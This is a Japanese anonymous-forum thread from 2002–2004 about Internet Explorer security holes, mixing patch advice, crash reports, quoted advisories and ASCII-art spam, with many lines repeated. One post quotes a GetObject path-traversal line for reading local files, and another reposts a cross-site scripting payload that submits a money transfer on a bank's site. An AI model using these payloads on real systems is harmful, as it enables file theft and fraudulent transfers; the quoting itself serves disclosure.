またIEにセキュリティホール!
313 :こっちにも、あけましておめでとう!:02/01/01 01:19
空けましておめでとうございます、今年もインターネットエクスプローラー
並びにWindowsのセキュリティーホール&欠陥をよろしくお願いいたします。
並びにWindowsのセキュリティーホール&欠陥をよろしくお願いいたします。
314 :名無しさん@お腹いっぱい。:02/01/03 15:37
AppVer.6.0.2600.0 ModName:kernel32.dll ModVer:4.10.0.2222 Offset:0001ad99
昨年12月、5.01sp2から6.0.2600.000IC 更新ver;Q313675;に変えたら
こんなエラーが出るようになった。なんか貰ったんでしょうか?
昨年12月、5.01sp2から6.0.2600.000IC 更新ver;Q313675;に変えたら
こんなエラーが出るようになった。なんか貰ったんでしょうか?
315 :名無しさん@お腹いっぱい。:02/01/03 15:41
316 :314:02/01/04 16:42
問題なし夫ちゃん?
317 :310:02/01/04 18:13
318 :過去レス読んだけど:02/01/04 22:42
NIS入れてから2ch書き込めない
IE6使ってます
エラー ぶらうざが変ですよん。って出ます。???
IE6使ってます
エラー ぶらうざが変ですよん。って出ます。???
319 :IE GetObject() problems:02/01/05 03:10
ttp://msgs.securepoint.com/cgi-bin/get/bugtraq0201/1/2/1.html
ローカルにあるファイルを読まれるモヨン。
もしかしたら任意のプログラムを実行するかも。
とりあえずWin2k+IE5.01sp2は問題なかった。
ローカルにあるファイルを読まれるモヨン。
もしかしたら任意のプログラムを実行するかも。
とりあえずWin2k+IE5.01sp2は問題なかった。
週刊セキュホールと化してるな>IE
321 :名無しさん@お腹いっぱい。:02/01/09 23:43
>>241
それって有効にしてもセキュリティには問題ないですか?
それって有効にしてもセキュリティには問題ないですか?
322 :名無しさん@お腹いっぱい。:02/01/10 00:58
323 :名無しさん@お腹いっぱい。:02/01/10 05:10
324 :名無しさん@お腹いっぱい。:02/01/10 06:32
だからActiveXもJAVAもJavaScriptもCSSも見捨ててネスケ使えとあれほど
325 :駄目じゃん:02/01/10 21:19
>323
>もっとも効果的な対処方法は、IE を使用しないことである。
>もっとも効果的な対処方法は、IE を使用しないことである。
326 :名無しさん@お腹いっぱい。:02/01/11 02:21
5.5Sp2にパッチを当てたら、送信バイト数が以前の倍くらいになってしまったんですが、
これっておかしいんでしょうか?
これっておかしいんでしょうか?
327 :BugTraq ID: 3767 :02/01/11 02:40
Microsoft Internet Explorer GetObject File Disclosure Vulnerability
BugTraq ID: 3767
リモートからの再現性: あり
公表日: Jan 01 2002 12:00A
関連するURL:
http://www.securityfocus.com/bid/3767
まとめ:
Microsoft Internet Explorer には、リモートの攻撃者が攻撃対象のコンピュー
タ内に存在する既知のファイルを、このソフトウェアの利用者が特別に組み立
てられたスクリプトを含む Web コンテンツを参照する際、閲覧できてしまう問
題が推察されている。
JScript の関数、GetObject() が ActiveX object 'htmlfile' と組み合わせて
利用される際に問題は発生する。この際、../ を含む URL が関数の最初の引数
として渡された場合、Microsoft Internet Explorer は生成された HTML 文書
オブジェクトの DOM に対し、どの様なアクセスであっても許可されてしまうの
である。
例:
a=GetObject("http://"+location.host+"/../../../../../../test.txt","htmlfile");
この問題により、悪意ある Web サイトの管理者による、攻撃対象のコンピュー
タ内に存在するいかなるファイルに対する内容の入手が可能になってしまうの
である。なお、この問題は任意のコードの実行も可能にすると推察される。
BugTraq ID: 3767
リモートからの再現性: あり
公表日: Jan 01 2002 12:00A
関連するURL:
http://www.securityfocus.com/bid/3767
まとめ:
Microsoft Internet Explorer には、リモートの攻撃者が攻撃対象のコンピュー
タ内に存在する既知のファイルを、このソフトウェアの利用者が特別に組み立
てられたスクリプトを含む Web コンテンツを参照する際、閲覧できてしまう問
題が推察されている。
JScript の関数、GetObject() が ActiveX object 'htmlfile' と組み合わせて
利用される際に問題は発生する。この際、../ を含む URL が関数の最初の引数
として渡された場合、Microsoft Internet Explorer は生成された HTML 文書
オブジェクトの DOM に対し、どの様なアクセスであっても許可されてしまうの
である。
例:
a=GetObject("http://"+location.host+"/../../../../../../test.txt","htmlfile");
この問題により、悪意ある Web サイトの管理者による、攻撃対象のコンピュー
タ内に存在するいかなるファイルに対する内容の入手が可能になってしまうの
である。なお、この問題は任意のコードの実行も可能にすると推察される。
328 :未解決!シティバンク:02/01/11 02:42
未解決!シティバンクのオンラインサイトにクロスサイトスクリプティング問題
http://www.zdnet.co.jp/enterprise/0201/09/02010913.html
https://www.c2it.com/C2IT/SendCash
<script> setTimeout("alert(document.forms[0].SRC_ACCOUNT.options[1].value)", 400); </script>
--
<script>
w=window.open("SendCash", "s","");
setTimeout("f=w.document.forms[0];f.DEST_EMAIL.value='[email protected]';
f.AMOUNT.value=10;f.submit();",15000);
setTimeout("w.document.forms[0].submit();", 15000);
</script>
---
http://www.devitry.com/c2it-security.html
http://www.zdnet.co.jp/enterprise/0201/09/02010913.html
https://www.c2it.com/C2IT/SendCash
<script> setTimeout("alert(document.forms[0].SRC_ACCOUNT.options[1].value)", 400); </script>
--
<script>
w=window.open("SendCash", "s","");
setTimeout("f=w.document.forms[0];f.DEST_EMAIL.value='[email protected]';
f.AMOUNT.value=10;f.submit();",15000);
setTimeout("w.document.forms[0].submit();", 15000);
</script>
---
http://www.devitry.com/c2it-security.html
329 :名無しさん@お腹いっぱい。:02/01/11 14:17
WindowsUpDateのサイトって今おかしくなってない?
穴も埋められね〜よ。
穴も埋められね〜よ。
330 :名無しさん@お腹いっぱい。:02/01/11 15:01
>>329
そこの情報は古いから、最新パッチをあてようと思うなら自分で巡回して収集したほうがいいぞ
そこの情報は古いから、最新パッチをあてようと思うなら自分で巡回して収集したほうがいいぞ
>>330
どうも。
↓で済ませました。
http://www.microsoft.com/japan/enable/products/security/
確かにWindowsUpDateでやるより良い。内容もちゃんと分かるし。
どうも。
↓で済ませました。
http://www.microsoft.com/japan/enable/products/security/
確かにWindowsUpDateでやるより良い。内容もちゃんと分かるし。
332 :名無しさん@お腹いっぱい。:02/01/13 23:44
ウイルスバスター2002を使ってます。IE6をアップデイト(Q313675)
してからだと思うのですが、バスターのアップデイトのたびに「IEに問題が
発生しましたので・・・」と表示され、IEが使用不能になります。
再起動しないとだめです。どこがおかしいのでしょうか?
してからだと思うのですが、バスターのアップデイトのたびに「IEに問題が
発生しましたので・・・」と表示され、IEが使用不能になります。
再起動しないとだめです。どこがおかしいのでしょうか?
333 :名無しさん@お腹いっぱい。:02/01/13 23:52
というわけで期待のブラウザ「opera」を使いましょう!!
334 :名無しさん@お腹いっぱい。:02/01/14 02:46
335 :な:02/01/19 11:43
336 :名無しさん@お腹いっぱい。:02/01/24 16:34
Microsoft Internet explorer は
PopUp オブジェクトを適切に処理できないことが原因で、
弱点が存在します。攻撃者にこの弱点を利用された場合、
リモートからシステムのアプリケーションを実行される可能性があります。
http://sid.softek.co.jp/loPrint.html?vg=1&htmlid=975
PopUp オブジェクトを適切に処理できないことが原因で、
弱点が存在します。攻撃者にこの弱点を利用された場合、
リモートからシステムのアプリケーションを実行される可能性があります。
http://sid.softek.co.jp/loPrint.html?vg=1&htmlid=975
337 :名無しさん@お腹いっぱい。:02/02/12 17:58
米Microsoftは米国時間2月11日,Internet Explorer(IE)の6種類の新しいセキュリティ・
ホールを公表するとともに,それらを修正する“累積”パッチを公開した。6種類のうち最も
深刻なセキュリティ・ホールを悪用されると,WebページやHTMLメールを閲覧しただけで,
仕込まれた任意のコードを実行してしまう恐れがある。IE 5.01 SP2/5.5 SP1/5.5 SP2/6
用のパッチが公開されているので,IEユーザーは適用する必要がある。ただし,IE 5.01
SP2 については Windows 2000 用のパッチだけが公開されている。
今回公開されたセキュリティ・ホールは以下の6種類。
(1)Buffer Overrun in HTML Directive
(2)File Reading via GetObject function
(3)File Download Dialogue Spoofing via Content-Type and Content-Disposition fields
(4)Application invocation via Content-Type field
(5)Script execution
(6)Frame Domain Verification Variant via Document.Open function
このうち,(1)と(2)および(6)については,IE 5.5/6 で「深刻度」が「最大(Critical)」と
されている。IE 5.01 は(1)と(5),(6)の影響を受けない。ただし,(1)から(6)のすべてを
合わせた深刻度は,IE 5.01/5.5/6 のいずれでも最大とされており,米Microsoftは
IEユーザーに対して,早急にパッチを適用することを勧めている。
米Microsoftのページに,日本語版用のパッチも用意されている。「Select Language」で
「Japanese」を選択すればダウンロードできる。パッチの適用条件は,IE 5.5 の場合は,
SP1 か SP2 を適用済み,IE 5.01 の場合には,SP2 を適用済みで,なおかつ OS が
Windows 2000である必要がある。また,IE 5.01 SP2 よりも古いバージョンではテスト
していないので,影響を受けるかどうかは不明であるとしている。
ソース: http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020212/2/
ホールを公表するとともに,それらを修正する“累積”パッチを公開した。6種類のうち最も
深刻なセキュリティ・ホールを悪用されると,WebページやHTMLメールを閲覧しただけで,
仕込まれた任意のコードを実行してしまう恐れがある。IE 5.01 SP2/5.5 SP1/5.5 SP2/6
用のパッチが公開されているので,IEユーザーは適用する必要がある。ただし,IE 5.01
SP2 については Windows 2000 用のパッチだけが公開されている。
今回公開されたセキュリティ・ホールは以下の6種類。
(1)Buffer Overrun in HTML Directive
(2)File Reading via GetObject function
(3)File Download Dialogue Spoofing via Content-Type and Content-Disposition fields
(4)Application invocation via Content-Type field
(5)Script execution
(6)Frame Domain Verification Variant via Document.Open function
このうち,(1)と(2)および(6)については,IE 5.5/6 で「深刻度」が「最大(Critical)」と
されている。IE 5.01 は(1)と(5),(6)の影響を受けない。ただし,(1)から(6)のすべてを
合わせた深刻度は,IE 5.01/5.5/6 のいずれでも最大とされており,米Microsoftは
IEユーザーに対して,早急にパッチを適用することを勧めている。
米Microsoftのページに,日本語版用のパッチも用意されている。「Select Language」で
「Japanese」を選択すればダウンロードできる。パッチの適用条件は,IE 5.5 の場合は,
SP1 か SP2 を適用済み,IE 5.01 の場合には,SP2 を適用済みで,なおかつ OS が
Windows 2000である必要がある。また,IE 5.01 SP2 よりも古いバージョンではテスト
していないので,影響を受けるかどうかは不明であるとしている。
ソース: http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020212/2/
338 :名無しさん@お腹いっぱい。:02/02/12 18:05
あげとく
339 :名無しさん@お腹いっぱい。:02/08/27 09:56
>>338
げとく
げとく
340 :名無しさん@お腹いっぱい。:02/10/24 03:55
340
(^^)
(^^)
343 :名無しさん@お腹いっぱい。:03/02/15 21:56
age
344 :名無しさん@お腹いっぱい。:03/02/15 23:01
今日はage荒らしが多いな…
IE5・5と6・0、ネット閲覧ソフトに欠陥
http://pc.2ch.net/test/read.cgi/sec/1005605775/l50
OE(又はIEコンポーネント使用メーラー)の問題点とその対策方法
http://pc.2ch.net/test/read.cgi/sec/1021363841/l50
IE5・5と6・0、ネット閲覧ソフトに欠陥
http://pc.2ch.net/test/read.cgi/sec/1005605775/l50
OE(又はIEコンポーネント使用メーラー)の問題点とその対策方法
http://pc.2ch.net/test/read.cgi/sec/1021363841/l50
(^^)
∧_∧
( ^^ )< ぬるぽ(^^)
( ^^ )< ぬるぽ(^^)
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―
∧_∧
ピュ.ー ( ^^ ) <これからも僕を応援して下さいね(^^)。
=〔~∪ ̄ ̄〕
= ◎――◎ 山崎渉
ピュ.ー ( ^^ ) <これからも僕を応援して下さいね(^^)。
=〔~∪ ̄ ̄〕
= ◎――◎ 山崎渉
349 :名無しさん@お腹いっぱい。:03/05/28 19:55
初心者ですみません。ADSLで常時接続にすると
ファイァーウォールというものを設定しないと
危険なのででしょうか 当方シマンテックのノートンを持ってますが
この中にあるのでしょうか?
ファイァーウォールというものを設定しないと
危険なのででしょうか 当方シマンテックのノートンを持ってますが
この中にあるのでしょうか?
350 :名無しさん@お腹いっぱい。:03/05/28 20:02
352 :名無しさん@お腹いっぱい。:03/06/14 11:40
また穴が開いたのかぁ〜
__∧_∧_
|( ^^ )| <寝るぽ(^^)
|\⌒⌒⌒\
\ |⌒⌒⌒~| 山崎渉
~ ̄ ̄ ̄ ̄
354 :ぼるじょあ ◆yBEncckFOU :03/08/02 05:18
∧_∧ ∧_∧
ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。
=〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
= ◎――――――◎ 山崎渉&ぼるじょあ
ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。
=〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
= ◎――――――◎ 山崎渉&ぼるじょあ
(⌒V⌒)
│ ^ ^ │<これからも僕を応援して下さいね(^^)。
⊂| |つ
(_)(_) 山崎パン
│ ^ ^ │<これからも僕を応援して下さいね(^^)。
⊂| |つ
(_)(_) 山崎パン
356 :名無しさん@お腹いっぱい。:03/10/08 01:27
\uff3f\u007c\uffe3\u007c\u25cb
357 :(・∀・)チンコー:03/10/27 20:18
マンコー
358 :名無しさん@お腹いっぱい。:04/06/10 16:34
359 :名無しさん@お腹いっぱい。:04/06/13 08:49
ヤフーの番組表見に行ったらカジノのアイコンをデスクトップに生成された。
糞ヤプー
糞ヤプー
360 :名無しさん@お腹いっぱい。:04/09/12 03:02:09
361 :名無しさん@お腹いっぱい。:04/09/18 07:01:02
qwik-fix使ってる人いますか?
どうしてあなたはメル欄にageと書くのですか?
そんなに私が「あのスレ」でメル欄にageと書いたのがあれでしたか?
そんなに私のことが気になりますか?
なんなら遊びに来てもいいですよ。
「インターネッツで見て、遊びに来ました」って言って、来てもいいですよ。
ただし即効で110番しますがwww
そんなに私が「あのスレ」でメル欄にageと書いたのがあれでしたか?
そんなに私のことが気になりますか?
なんなら遊びに来てもいいですよ。
「インターネッツで見て、遊びに来ました」って言って、来てもいいですよ。
ただし即効で110番しますがwww